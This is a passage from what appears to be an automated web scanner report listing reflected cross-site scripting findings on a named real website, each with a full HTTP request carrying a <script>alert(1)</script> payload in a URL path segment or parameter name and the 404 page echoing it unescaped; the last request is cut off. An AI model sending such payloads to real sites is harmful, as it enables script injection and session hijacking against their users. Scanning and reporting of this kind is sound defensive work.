This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information3dc2d<script>alert(1)</script>b4d18213563/ebooks/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information3dc2d<script>alert(1)</script>b4d18213563/ebooks/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3988. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f566d<script>alert(1)</script>455d73759f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksf566d<script>alert(1)</script>455d73759f5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksf566d<script>alert(1)</script>455d73759f5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3989. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17bd1<script>alert(1)</script>4dea439c857 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes17bd1<script>alert(1)</script>4dea439c857/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes17bd1<script>alert(1)</script>4dea439c857/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3990. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fbf5<script>alert(1)</script>e278c2d8477 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos9fbf5<script>alert(1)</script>e278c2d8477/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos9fbf5<script>alert(1)</script>e278c2d8477/ was not found on this server.</p>
...[SNIP]...

2.3991. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cd12f<script>alert(1)</script>435c733f034 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/?cd12f<script>alert(1)</script>435c733f034=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/?cd12f<script>alert(1)</script>435c733f034=1 was not found on this server.</p>
...[SNIP]...

2.3992. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 453af<script>alert(1)</script>f0373629d4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information453af<script>alert(1)</script>f0373629d4c/ebooks/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information453af<script>alert(1)</script>f0373629d4c/ebooks/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3993. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb49f<script>alert(1)</script>ed48309c308 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebookseb49f<script>alert(1)</script>ed48309c308/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebookseb49f<script>alert(1)</script>ed48309c308/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3994. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9de87<script>alert(1)</script>d789981ea38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes9de87<script>alert(1)</script>d789981ea38/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes9de87<script>alert(1)</script>d789981ea38/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.3995. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7e856<script>alert(1)</script>d7193c5b61c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos7e856<script>alert(1)</script>d7193c5b61c/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos7e856<script>alert(1)</script>d7193c5b61c/images/ was not found on this server.</p>
...[SNIP]...

2.3996. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 45d55<script>alert(1)</script>0f4ba834f7b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images45d55<script>alert(1)</script>0f4ba834f7b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images45d55<script>alert(1)</script>0f4ba834f7b/ was not found on this server.</p>
...[SNIP]...

2.3997. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4d55<script>alert(1)</script>e44d3d77a90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/?f4d55<script>alert(1)</script>e44d3d77a90=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/?f4d55<script>alert(1)</script>e44d3d77a90=1 was not found on this server.</p>
...[SNIP]...

2.3998. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6be97<script>alert(1)</script>8f46e039ac3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information6be97<script>alert(1)</script>8f46e039ac3/ebooks/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information6be97<script>alert(1)</script>8f46e039ac3/ebooks/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3999. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3e8fc<script>alert(1)</script>79f58fc56ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks3e8fc<script>alert(1)</script>79f58fc56ac/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks3e8fc<script>alert(1)</script>79f58fc56ac/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4000. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2aa5<script>alert(1)</script>d0f50e781a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themesb2aa5<script>alert(1)</script>d0f50e781a9/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themesb2aa5<script>alert(1)</script>d0f50e781a9/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4001. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14339<script>alert(1)</script>40489025520 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos14339<script>alert(1)</script>40489025520/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos14339<script>alert(1)</script>40489025520/images/rating/ was not found on this server.</p>
...[SNIP]...

2.4002. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 2dd19<script>alert(1)</script>70273f00ed6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images2dd19<script>alert(1)</script>70273f00ed6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images2dd19<script>alert(1)</script>70273f00ed6/rating/ was not found on this server.</p>
...[SNIP]...

2.4003. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b4bb2<script>alert(1)</script>e8d4e3e236b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/ratingb4bb2<script>alert(1)</script>e8d4e3e236b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/ratingb4bb2<script>alert(1)</script>e8d4e3e236b/ was not found on this server.</p>
...[SNIP]...

2.4004. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ed60<script>alert(1)</script>d8c3aea8e4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/kosmos/images/rating/?5ed60<script>alert(1)</script>d8c3aea8e4a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/kosmos/images/rating/?5ed60<script>alert(1)</script>d8c3aea8e4a=1 was not found on this server.</p>
...[SNIP]...

2.4005. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 878c5<script>alert(1)</script>3a7ca6de890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information878c5<script>alert(1)</script>3a7ca6de890/ebooks/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:52:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information878c5<script>alert(1)</script>3a7ca6de890/ebooks/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.4006. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /resources-information/ebooks/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26214<script>alert(1)</script>a1bcf784213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks26214<script>alert(1)</script>a1bcf784213/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
